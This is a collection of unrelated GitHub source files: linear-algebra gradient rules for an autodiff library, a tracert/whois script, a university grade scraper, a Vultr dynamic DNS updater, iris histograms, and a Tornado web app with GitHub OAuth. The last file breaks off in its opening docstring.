fmatrix(s)(\"ij\")\n vTdv = v.T(\"im\") @ dv(\"mj\")\n\n grad1 = f * vTdv \n grad2 = f * ((v.T(\"im\") @ v.C(\"mn\")) @ (tn.real(vTdv) * eye(vTdv))(\"nj\"))\n\n grad = ds(\"1j\") * eye(s,\"ij\") + grad1 - grad2\n grad = la.inv(v.T)(\"li\") @ grad(\"ij\") @ v.T(\"jr\")\n \n if not tn.iscomplex(x):\n grad = tn.real(grad)\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Eigendecomposition (Hermitian) ---------------------------------------- #\n\ndef vjp_eigh(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/1701.00392\n \n Eq. 
4.71 (take complex conjugate of both sides)\n\n Comments:\n\n * numpy and pytorch use UPLO=\"L\" by default\n\n * tensorflow always uses UPLO=\"L\"\n https://www.tensorflow.org/api_docs/python/tf/linalg/eigh\n\n \"\"\"\n\n dv, ds = g\n v, s = out\n\n grad = eye(s,\"ij\") * ds(\"i1\")\n\n if not tn.allclose(dv, tn.space(dv).zeros()): \n grad = grad + fmatrix(s)(\"ij\") * (v.T(\"im\") @ dv(\"mj\"))\n\n grad = v(\"li\").C @ grad @ v.T(\"jr\") \n\n tl = la.tril(tn.space(grad).ones(), k=-1)\n grad = tn.real(grad) * eye(grad) \\\n + (grad(\"lr\") + grad.H(\"lr\")) * tl(\"lr\") \n \n return grad(*tn.union_inds(x))\n\n\n\n\n# --- QR decomposition ------------------------------------------------------ #\n\ndef vjp_qr(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(r, a):\n\n return la.trisolve(r, a.H, which=\"upper\").H\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(q, dq, r, dr):\n\n m = r(\"im\") @ dr.H(\"mj\") - dq.H(\"im\") @ q(\"mj\")\n\n return trisolve(r(\"jr\"), dq(\"lj\") + q(\"li\") @ hcopyltu(m)(\"ij\"))\n\n\n dq, dr = g\n q, r = out\n\n if x.shape[0] >= x.shape[1]:\n return kernel(q, dq, r, dr)(*tn.union_inds(x))\n\n x1, x2 = x[:, : x.shape[0]], x[:, x.shape[0] :]\n r1, r2 = r[:, : x.shape[0]], r[:, x.shape[0] :]\n dr1, dr2 = dr[:, : x.shape[0]], dr[:, x.shape[0] :]\n\n dx1 = kernel(q, dq(\"li\") + x2(\"lr\") @ dr2.H(\"ri\"), r1, dr1)\n dx2 = q(\"li\") @ dr2(\"ir\")\n\n return la.concat(\n dx1(\"ia\"), \n dx2(\"ib\"), \n inds=tuple(tn.union_inds(x)), \n which=\"right\"\n )\n\n\n\n\n# --- LQ decomposition ------------------------------------------------------ #\n\ndef vjp_lq(g, out, x, sind=None):\n\n \"\"\"\n https://arxiv.org/abs/2009.10071\n\n \"\"\"\n\n def trisolve(l, a):\n\n return la.trisolve(l.H, a, which=\"upper\")\n\n\n def hcopyltu(m):\n\n E = 2 * la.tril(tn.space(m).ones(), k=-1) + tn.space(m).eye()\n m = m * E\n\n return (m(\"ij\") + m.H(\"ij\")) / 2\n\n\n def kernel(l, dl, q, dq):\n\n m = l.H(\"im\") @ dl(\"mj\") - dq(\"im\") @ q.H(\"mj\")\n\n return trisolve(l(\"li\"), dq(\"ir\") + hcopyltu(m)(\"ij\") @ q(\"jr\"))\n\n\n dl, dq = g\n l, q = out\n\n if x.shape[0] <= x.shape[1]:\n return kernel(l, dl, q, dq)(*tn.union_inds(x))\n\n x1, x2 = x[: x.shape[1], :], x[x.shape[1] :, :]\n l1, l2 = l[: x.shape[1], :], l[x.shape[1] :, :]\n dl1, dl2 = dl[: x.shape[1], :], dl[x.shape[1] :, :]\n\n dx1 = kernel(l1, dl1, q, dq(\"ir\") + dl2.H(\"il\") @ x2(\"lr\"))\n dx2 = dl2(\"li\") @ q(\"ir\")\n\n return la.concat(\n dx1(\"ai\"), \n dx2(\"bi\"), \n inds=tuple(tn.union_inds(x)), \n which=\"left\"\n )\n\n\n\n\n# --- Record decomp VJPs ---------------------------------------------------- # \n\nad.makevjp(la.svd, vjp_svd)\nad.makevjp(la.eig, vjp_eig)\nad.makevjp(la.eigh, vjp_eigh)\nad.makevjp(la.qr, vjp_qr)\nad.makevjp(la.lq, vjp_lq)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of standard matrix properties and transformations ###\n### ###\n###############################################################################\n\n\n# --- Norm ------------------------------------------------------------------ #\n\ndef vjp_norm(g, out, x, order=None, **opts):\n\n \"\"\"\n https://people.maths.ox.ac.uk/gilesm/files/NA-08-01.pdf\n https://en.wikipedia.org/wiki/Norm_(mathematics)#p-norm\n\n \"\"\"\n\n if order in (None, 'fro'):\n\n return (g / out) * x.C \n\n\n if order == 'nuc':\n\n 
U, S, VH, error = la.svd(x)\n\n return g * (U.C @ VH.C)\n\n\n raise ValueError(\n f\"vjp_norm: invalid norm order {order} provided. The order must \"\n f\"be one of: None, 'fro', 'nuc'.\"\n )\n\n\n\n\n# --- Trace ----------------------------------------------------------------- #\n\ndef vjp_trace(g, out, x, **opts):\n\n return tn.space(x).eye() * g\n\n\n\n\n# --- Determinant ----------------------------------------------------------- #\n\ndef vjp_det(g, out, x):\n\n return g * out * la.inv(x).T\n\n\n\n\n# --- Inverse --------------------------------------------------------------- #\n\ndef vjp_inv(g, out, x):\n\n grad = -out.T(\"ij\") @ g(\"jk\") @ out.T(\"kl\")\n\n return grad(*tn.union_inds(x))\n\n\n\n\n# --- Diagonal -------------------------------------------------------------- #\n\ndef vjp_diag(g, out, x, inds, **opts): \n\n xinds = list(tn.union_inds(x))\n\n i = min(xinds, key=len)\n j = i.retagged(\"j\")\n k = xinds[1 - xinds.index(i)] \n\n grad = (g(i,\"1\") * tn.space(x).eye(i,j)) @ tn.space(x).eye(j,k) \n\n return tn.transpose_like(grad, x)\n\n\n\n\n# --- Concatenate matrices -------------------------------------------------- #\n\ndef vjp_concat(g, adx, out, *xs, inds, which=None, **opts): \n\n axis = {\n None: 0, \n \"left\": 0, \n \"right\": 1,\n }[which]\n \n start = sum([x.shape[axis] for x in xs[:adx]])\n size = xs[adx].shape[axis] \n\n adx_slice = [slice(None), slice(None)]\n adx_slice[axis] = slice(start, start + size)\n\n return g[tuple(adx_slice)](*tn.union_inds(xs[adx])) \n\n\n\n\n# --- Record standard linalg VJPs ------------------------------------------- #\n\nad.makevjp(la.norm, vjp_norm)\nad.makevjp(la.trace, vjp_trace)\nad.makevjp(la.det, vjp_det)\nad.makevjp(la.inv, vjp_inv)\nad.makevjp(la.diag, vjp_diag)\n\nad.makevjp(la.tril, lambda g, out, x, **opts: la.tril(g, **opts))\nad.makevjp(la.triu, lambda g, out, x, **opts: la.triu(g, **opts))\n\nad.makevjp_combo(la.concat, vjp_concat)\n\n\n\n\n###############################################################################\n### ###\n### VJP's of linear algebra solvers ###\n### ###\n###############################################################################\n\n\n# --- Solve the equation ax = b --------------------------------------------- #\n\ndef vjpA_solve(g, out, a, b):\n\n return -la.solve(a.T, g) @ out.T\n\n\ndef vjpB_solve(g, out, a, b):\n\n return la.solve(a.T, g)\n\n\n\n\n# --- Solve the equation ax = b, assuming a is a triangular matrix ---------- #\n\ndef tri(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": la.tril, \n \"upper\": la.triu,\n }[which]\n\n\ndef opposite(which):\n\n if which is None:\n which = \"upper\"\n\n return {\n \"lower\": \"upper\", \n \"upper\": \"lower\",\n }[which]\n\n\ndef vjpA_trisolve(g, out, a, b, which=None):\n\n return -tri(which)(la.trisolve(a.T, g, which=opposite(which)) @ out.T)\n \n\ndef vjpB_trisolve(g, out, a, b, which=None):\n\n return la.trisolve(a.T, g, which=opposite(which))\n\n\n\n\n# --- Record linalg solver VJPs --------------------------------------------- #\n\nad.makevjp(la.solve, vjpA_solve, vjpB_solve)\nad.makevjp(la.trisolve, vjpA_trisolve, vjpB_trisolve)\n \n\n \n\n","repo_name":"dkilda/tadpole","sub_path":"tadpole/tensorwrap/vjps/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74323685609","text":"from ipwhois import IPWhois\nimport subprocess\nimport re\n\n\ndef tracert(name):\n try:\n return 
subprocess.check_output(r'tracert ' + name, shell=True)\n except subprocess.CalledProcessError:\n print('ошибка tracert')\n\n\ndef who_is(ip):\n try:\n data = IPWhois(ip).lookup_whois()\n return 'ip : ' + ip + '\\n' + \\\n 'ASN : ' + data['asn'] + '\\n' + \\\n 'country : ' + data['asn_country_code'] + '\\n' + \\\n 'provider : ' + data['nets'][0]['description'] + '\\n' + \\\n 'provider address : ' + data['nets'][0]['address'] + '\\n'\n except:\n return ip + ' : ASN - None'\n\n\ndef main():\n pattern = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n while True:\n print(r'введите ip/имя сервера')\n s = input()\n if s == 'exit':\n break\n else:\n raw_data = tracert(s).decode('cp866')\n if raw_data:\n res = [who_is(ip) for ip in pattern.findall(raw_data)[1:]]\n for i in range(1, len(res) + 1):\n print('number :', i)\n print(res[i - 1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DenisBelovED/TracertExtended","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12070063606","text":"# created by WuLei on January 31 2018\n# wuleiatso@gmail.com\n\nimport jwlogin\nimport re\nfrom lxml import etree\n\nclass query(object):\n def __init__(self, session, sessionid):\n self.session = session\n self.sessionid = sessionid\n\n def get_usercode(self):\n url = 'http://202.113.110.22:8088/tjsfjw/custom/js/SetRootPath.jsp'\n header = {'Accept':'*/*',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Connection':'keep-alive',\n 'Cookie':'JSESSIONID=' + self.sessionid,\n 'Host':'202.113.110.22:8088',\n 'Referer':'http://202.113.110.22:8088/tjsfjw/student/wsxk.pyfadb.html?menucode=JW130713',\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}\n r = self.session.get(url, headers = header)\n self.usercode = re.findall(r'G_USER_CODE = \\'(.*?)\\';', r.text)[0]\n print('user_code: ', self.usercode)\n print('user_name: ', re.findall(r'G_USER_NAME = \\'(.*?)\\';', r.text)[0])\n\n def loadinfo(self):\n url = 'http://202.113.110.22:8088/tjsfjw/student/xscj.stuckcj_data.jsp'\n params = {'sjxz':'sjxz3',\n 'ysyx':'yscj',\n 'zx':'1',\n 'fx':'1',\n 'userCode':str(self.usercode),\n 'xypjwchcnckcj':'0',\n 'pjwchckcjklpbcj':'0',\n 'xn':'2017',\n 'xn1':'2018',\n 'xq':'0',\n 'ysyxS':'on',\n 'sjxzS':'on',\n 'zxC':'on',\n 'fxC':'on',\n 'menucode_current':'JW1314'}\n headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n content = self.session.get(url, params = params, headers = headers)\n return content.text\n\n def parsescores(self, content = None):\n if content == None:\n print('query failed')\n exit(1)\n selector = etree.HTML(content)\n c = selector.xpath('/html/body/table[2]/tbody/tr')\n j=0\n for i in c:\n print(selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[2]/text()')[0] +' ' + selector.xpath('/html/body/table[2]/tbody/tr[' + str(j+1) + ']/td[8]/text()')[0])\n j = j + 1\n\n\n def holdconnection(self):\n url = 'http://202.113.110.22:8088/tjsfjw/online/message'\n params = {'hidOption':'getOnlineMessage'}\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = self.session.get(url, headers = headers, params = params)\n if r.status_code == 200:\n print('holding 
connection')\n\ndef go():\n s, sid = jwlogin.go()\n q = query(s, sid)\n q.holdconnection()\n q.get_usercode()\n q.holdconnection()\n q.parsescores(content=q.loadinfo())\n\nif __name__ == '__main__':\n go()","repo_name":"3swu/tjsfjwlogin","sub_path":"queryscores.py","file_name":"queryscores.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20741327089","text":"import functools\nimport random\n\nimport tornado.auth\nimport tornado.escape\nimport tornado.gen\nimport tornado.httpclient\nimport tornado.web\n\nfrom tornado.web import HTTPError\nfrom tornado.web import authenticated\n\nimport peewee\n\nfrom peewee import fn\n\nfrom models import User, Repo, HMap, CSet, Token\nfrom handlers import RequestHandler\n\nclass BaseHandler(RequestHandler):\n \"\"\"Base class for all web front end handlers.\"\"\"\n\n def get_current_user(self):\n uid = self.get_secure_cookie(\"uid\")\n user = User.get(User.id == uid) if uid else None\n return user\n\n def set_current_user(self, user):\n self.set_secure_cookie(\"uid\", str(user.id))\n\n def clear_current_user(self):\n self.clear_cookie(\"uid\")\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render(\"error/404.html\")\n else:\n self.render(\"error/gen.html\")\n\nclass HomeHandler(BaseHandler):\n \"\"\"Renders the website index page - nothing more.\"\"\"\n\n def get(self):\n self.render(\"home/index.html\")\n\nclass SearchHandler(BaseHandler):\n def get(self):\n query = tornado.escape.url_unescape(self.get_argument(\"q\", \"\"))\n\n if query:\n pattern = \"%\" + query + \"%\"\n repos = (Repo.select().join(User).alias(\"user\")\n .where(Repo.name ** pattern))\n users = User.select().where(User.name ** pattern)\n else:\n repos = []\n users = []\n\n self.render(\"search/show.html\", query=query, repos=repos, users=users)\n\nclass UserHandler(BaseHandler):\n def get(self, username):\n try:\n user = User.select().where(User.name == username).get()\n self.render(\"user/show.html\", title=user.name, user=user)\n except User.DoesNotExist:\n raise HTTPError(404)\n\nclass EditUserHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Edit account information\"\n self.render(\"user/edit.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n user = self.current_user\n user.name = self.get_argument(\"username\", None)\n user.homepage_url = self.get_argument(\"homepage\", None)\n user.avatar_url = self.get_argument(\"avatar\", None)\n user.email = self.get_argument(\"email\", None)\n user.save()\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass RepoHandler(BaseHandler):\n def get(self, username, reponame):\n try:\n repo = (Repo.select().join(User).alias(\"user\")\n .where((User.name == username) & (Repo.name == reponame))\n .get())\n title = repo.user.name + \"/\" + repo.name\n\n timemap = self.get_query_argument(\"timemap\", \"false\") == \"true\"\n datetime = self.get_query_argument(\"datetime\", None)\n key = self.get_query_argument(\"key\", None)\n\n if key and not timemap:\n self.render(\"repo/memento.html\", repo=repo, key=key,\n datetime=datetime)\n elif key and timemap:\n self.render(\"repo/history.html\", repo=repo, key=key)\n else:\n cs = (CSet.select(fn.distinct(CSet.hkey))\n .where(CSet.repo == repo).limit(5).alias(\"cs\"))\n samples = (HMap.select(HMap.val)\n .join(cs, on=(HMap.sha == cs.c.hkey_id)))\n self.render(\"repo/show.html\", title=title, 
repo=repo,\n samples=list(samples))\n except Repo.DoesNotExist:\n raise HTTPError(404)\n\nclass CreateRepoHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Create a new repository\"\n self.render(\"repo/new.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n reponame = self.get_argument(\"reponame\", None)\n desc = self.get_argument(\"description\", None)\n user = self.current_user\n if not reponame:\n self.redirect(self.reverse_url(\"web:create-repo\"))\n return\n repo = Repo.create(user=user, name=reponame, desc=desc)\n self.redirect(self.reverse_url(\"web:repo\", user.name, repo.name))\n\nclass SettingsHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Account settings\"\n self.render(\"settings/index.html\", title=title, user=user,\n tokens=user.tokens)\n\n def on_finish(self):\n q = Token.update(seen=True).where(Token.user == self.current_user)\n q.execute()\n super(SettingsHandler, self).on_finish()\n\nclass NewTokenHandler(BaseHandler):\n @authenticated\n def get(self):\n self.render(\"tokens/new.html\")\n\n @authenticated\n def post(self):\n user = self.current_user\n desc = self.get_argument(\"description\")\n value = \"%040x\" % random.randrange(16**40)\n # TODO: Retry on duplicate token value (peewee.IntegrityError)?\n Token.create(user=user, value=value, desc=desc)\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass DelTokenHandler(BaseHandler):\n @authenticated\n def post(self, id):\n try:\n token = Token.get((Token.user == self.current_user) & (Token.id == id))\n token.delete_instance()\n self.redirect(self.reverse_url(\"web:settings\"))\n except:\n raise HTTPError(404)\n\nclass JoinHandler(BaseHandler):\n \"\"\"Allows users to join through email and password or GitHub OAuth.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"join/new.html\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # email = self.get_argument(\"email\")\n # name = self.get_argument(\"username\")\n # pass, salt = ...\n # try:\n # User.create(name=username, email=email, pass=pass, salt=salt)\n # except peewee.IntegrityError:\n # self.redirect(self.reverse_url(\"web:join\"))\n # self.redirect(\"/\")\n\nclass AuthHandler(BaseHandler):\n \"\"\"Authenticates users via username and password.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"auth/new.html\", title=\"Sign in - tailr\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # username = self.get_argument(\"username\")\n # user = User.get(User.name == username)\n # # confirm password, else deny access\n # if user... 
== ...:\n # self.set_current_user(user)\n # self.redirect(self.get_argument(\"next\", \"/\"))\n # else:\n # self.redirect(self.reverse_url(\"web:auth\"))\n\nclass GitHubOAuth2Mixin(tornado.auth.OAuth2Mixin):\n \"\"\"GitHub authentication using OAuth2.\"\"\"\n\n _OAUTH_ACCESS_TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n _OAUTH_AUTHORIZE_URL = \"https://github.com/login/oauth/authorize\"\n _OAUTH_SETTINGS_KEY = \"github_oauth\"\n\n _GITHUB_API_BASE_URL = \"https://api.github.com\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, redirect_uri, code, callback):\n http = self.get_auth_http_client()\n\n body = tornado.auth.urllib_parse.urlencode({\n \"redirect_uri\": redirect_uri,\n \"code\": code,\n \"client_id\": self.settings[self._OAUTH_SETTINGS_KEY][\"key\"],\n \"client_secret\": self.settings[self._OAUTH_SETTINGS_KEY][\"secret\"],\n })\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n }\n\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL,\n functools.partial(self._on_access_token, callback),\n method=\"POST\", headers=headers, body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n msg = \"GitHub auth error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n args = tornado.escape.json_decode(response.body)\n\n self.github_request(\"/user\",\n functools.partial(self._on_user_info, future),\n access_token=args[\"access_token\"])\n\n @tornado.auth._auth_return_future\n def github_request(self, path, callback, access_token=None, **args):\n url = self._GITHUB_API_BASE_URL + path\n\n headers = {\n \"User-Agent\": \"tailr\",\n \"Accept\": \"application/json\",\n }\n\n if access_token is not None:\n headers[\"Authorization\"] = \"token %s\" % access_token\n\n callback = functools.partial(self._on_github_request, callback)\n\n http = self.get_auth_http_client()\n\n http.fetch(url, callback, headers=headers)\n\n def _on_github_request(self, future, response):\n if response.error:\n msg = \"GitHub API error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n result = tornado.escape.json_decode(response.body)\n future.set_result(result)\n\n def _on_user_info(self, future, info):\n future.set_result(info)\n\n def get_auth_http_client(self):\n return tornado.httpclient.AsyncHTTPClient()\n\nclass GitHubAuthHandler(BaseHandler, GitHubOAuth2Mixin):\n \"\"\"Authenticates users via GitHub OAuth.\"\"\"\n\n @tornado.gen.coroutine\n def get(self):\n if self.get_argument(\"code\", False):\n info = yield self.get_authenticated_user(\n redirect_uri=self.redirect_uri,\n code=self.get_argument(\"code\"))\n\n github_id = info.get(\"id\", None)\n\n if github_id is None:\n self.redirect(self.reverse_url(\"web:auth\"))\n return\n\n try:\n user = User.get(User.github_id == github_id)\n except User.DoesNotExist:\n user = None\n\n if user is None:\n data = dict(\n name=info.get(\"login\"),\n github_id=github_id,\n homepage_url=info.get(\"html_url\", None),\n avatar_url=info.get(\"avatar_url\", None),\n email=info.get(\"email\", None),\n confirmed=True)\n\n try:\n # try to use the users GitHub login name\n user = User.create(**data)\n except peewee.IntegrityError:\n # assign a temporary, random name\n data[\"name\"] = \"%040x\" % random.randrange(16**40)\n user = User.create(**data)\n\n self.set_current_user(user)\n\n self.redirect(self.get_argument(\"next\", \"/\"))\n else:\n # TODO: pass 
additional random `state` parameter and\n # check the value in the conditional branch above\n yield self.authorize_redirect(\n redirect_uri=self.redirect_uri,\n client_id=self.settings[\"github_oauth\"][\"key\"],\n response_type=\"code\",\n scope=[\"user:email\"])\n\n @property\n def redirect_uri(self):\n return \"%s://%s%s\" % (self.request.protocol,\n self.request.host, \"/auth/github\")\n\nclass DeauthHandler(BaseHandler):\n @authenticated\n def post(self):\n self.clear_current_user()\n self.redirect(\"/\")\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with ``status_code`` for all requests.\"\"\"\n\n def initialize(self, status_code):\n self.set_status(status_code)\n\n def prepare(self):\n super(ErrorHandler, self).prepare()\n raise tornado.web.HTTPError(self.get_status())\n\n def check_xsrf_cookie(self):\n pass\n","repo_name":"pmeinhardt/tlr","sub_path":"handlers/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70035382569","text":"#!/usr/bin/env python3\n'''\nDynamic DNS service for Vultr\nBy Andy Smith\nhttps://ajsmith.us/\nhttps://github.com/andyjsmith/Vultr-Dynamic-DNS\n'''\n\nimport json\nimport sys\nimport requests\n\n# Import the values from the configuration file\nwith open(\"config.json\") as config_file:\n\tconfig = json.load(config_file) # Convert JSON to Python\n\ndomain = config[\"domain\"]\napi_key = config[\"api_key\"]\ndynamic_records = config[\"dynamic_records\"]\n\n# Get the public IP of the server\nip = requests.get(\"https://ip4.seeip.org\").text\ntry:\n\tipv6 = requests.get(\"https://ip6.seeip.org\", timeout=10).text\nexcept (requests.ConnectionError, requests.exceptions.Timeout) as e:\n\tprint(f'Couldn\\'t get IPv6 address, using IPv4 only.')\n\tipv6 = None\n\nresponse = requests.get(\"https://api.vultr.com/v2/domains/{}/records?per_page=500\".format(domain), headers={\"Authorization\": \"Bearer \" + api_key})\n\n# Get the list of DNS records from Vultr to translate the record name to recordid\nraw_response = response.text\nif \"is not authorized\" in raw_response:\n\tprint(\"There was an error. You are not authorized to use the API. 
Details are below.\")\n\tprint(\"NOTE: If using IPv6, or an IPv6 address is displayed below, you need to go to your account API settings and click Allow all IPv6.\")\n\tprint(\"Error returned from Vultr API:\")\n\ntry:\n\tresponse.raise_for_status()\nexcept requests.HTTPError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ntry:\n\traw_records = json.loads(raw_response)\nexcept json.decoder.JSONDecodeError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ndef get_records_to_change(record_type, ip):\n\t# Filter out other records besides A/AAAA records\n\trecords_to_check = [\n\t\trecord\n\t\tfor record in raw_records[\"records\"]\n\t\tif record[\"type\"] == record_type and record[\"name\"] in dynamic_records\n\t]\n\n\trecords_to_change = [\n\t\trecord\n\t\tfor record in records_to_check\n\t\tif record[\"data\"] != ip\n\t]\n\n\tfor record in records_to_change:\n\t\trecord[\"new_ip\"] = ip\n\n\treturn records_to_check, records_to_change\n\ncheck_ipv4, change_ipv4 = get_records_to_change(\"A\", ip)\ncheck_ipv6, change_ipv6 = get_records_to_change(\"AAAA\", ipv6) if ipv6 is not None else ([], [])\n\n# Cancel if no records from Vultr match the config file\nif len(check_ipv4+check_ipv6) == 0:\n\tprint(\"Configuration error, no records to change.\")\n\tsys.exit(1)\n\nrecords_to_change = change_ipv4 + change_ipv6\nif len(records_to_change) == 0:\n\tprint(\"IP address has not changed. No records have been updated.\")\n\tsys.exit(0)\n\nchanges = sorted(set(\n\t(record[\"data\"], record[\"new_ip\"])\n\tfor record in records_to_change\n))\n\nprint(\"IP has changed since last checking.\")\nfor old_ip, new_ip in changes:\n\tprint(f\"Old IP on Vultr: {old_ip}, current server IP: {new_ip}\")\n\n# Update the records in Vultr with the new IP address\nfor record in records_to_change:\n\tpayload = {\"data\": record[\"new_ip\"]}\n\tresponse = requests.patch(\"https://api.vultr.com/v2/domains/{}/records/{}\".format(domain, record[\"id\"]), json=payload, headers={\"Authorization\": \"Bearer \" + api_key})\n\tname = record[\"name\"]\n\tif name == \"\":\n\t\tname = \"@\"\n\tif \"error\" in response.text:\n\t\tprint(\"Error returned from Vultr API:\")\n\t\tprint(response.text)\n\telse:\n\t\tprint(f\"Changed {name}/{record['type']} ({record['id']}) to {record['new_ip']} in {domain}\")\n","repo_name":"andyjsmith/Vultr-Dynamic-DNS","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"33998696076","text":"# Fiona O'Riordan 28 March 2019 \n# Project Iris Data Set\n# Create histograms for all 4 variables in the data set distinctly showing an approximate frequency distribution of each of the quantitative variables in the set.\n# Adapted from:\n# https://machinelearningmastery.com/machine-learning-in-python-step-by-step/ [18]\n# https://www.youtube.com/watch?v=r75BPh1uk38 [19]\n# https://stackoverflow.com/a/19603918/11250489 [20]\n# https://stackoverflow.com/questions/37970424/what-is-the-difference-between-drawing-plots-using-plot-axes-or-figure-in-matpl/37970713 [21]\n# import the pandas libary in order to use the read_csv function below and rename as pd \nimport pandas as pd\n# import the matplotlib library class pyplot in order to use the show function below and rename as plt\nimport matplotlib.pyplot as plt\n\n\n# url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\" \nnames = 
['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'] \n# load the data by reading in the iris csv\niris = pd.read_csv(\"iris.csv\", names=names)\n\n# create a histogram for all the 4 variables \n# the default number of bins =10 but set the number of bins = 20 so that we can see the data grouped into smaller ranges.\n# plt.hist(bins=20)\n\n# creating the histograms for all 4 variables distinctly so that I can label \n# and color each chart distinctly\n\n# name the output file \nplt.figure('Histogram1')\nplt.subplot(2,2,1)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('petal-width')\n\n\nplt.subplot(2,2,2)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.title('petal-length')\n\nplt.subplot(2,2,3)\niris['sepal-length'].hist(bins=20)\n# create x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-length')\n\nplt.subplot(2,2,4)\niris['sepal-width'].hist(bins=20)\n# create an x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-width')\n\n\n# generate a file to output the graph\nplt.show()\n\n","repo_name":"fionaoriordan/52445_19_iris","sub_path":"histiris.py","file_name":"histiris.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4869649203","text":"# encoding: utf-8\n# file: data_util.py\n# author: shawn233\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport numpy as np\n\n'''\nFunctions:\n1. divide data into training set, dev set and test set (7:1:2)\n2. provide function `next_batch()`, returns the next batch in one epoch;\n provide function `reset_batch()`, to reset the batch for a new epoch.\n\nUsage tips:\n1. Assume memory is large enough to store all data, will use `readlines()` to read data;\n'''\n\n'''\nTODO:\n1. divide data based on date; (done)\n2. add time stamp to feature; (done)\n3. delete midprice for feature; (done)\n4. clean data to include only 3-sec intervals; (done)\n5. remove time stamp intervals from features; (done)\n6. attemp: remove volume from features; success? (seens not)\n7. fine processing of data_matrix to get more train data: \n eliminate intervals less than 3 secs; (done) (may need to discard)\n8. correct the mistake of crossing a day when calculating mean mid price;\n9. 
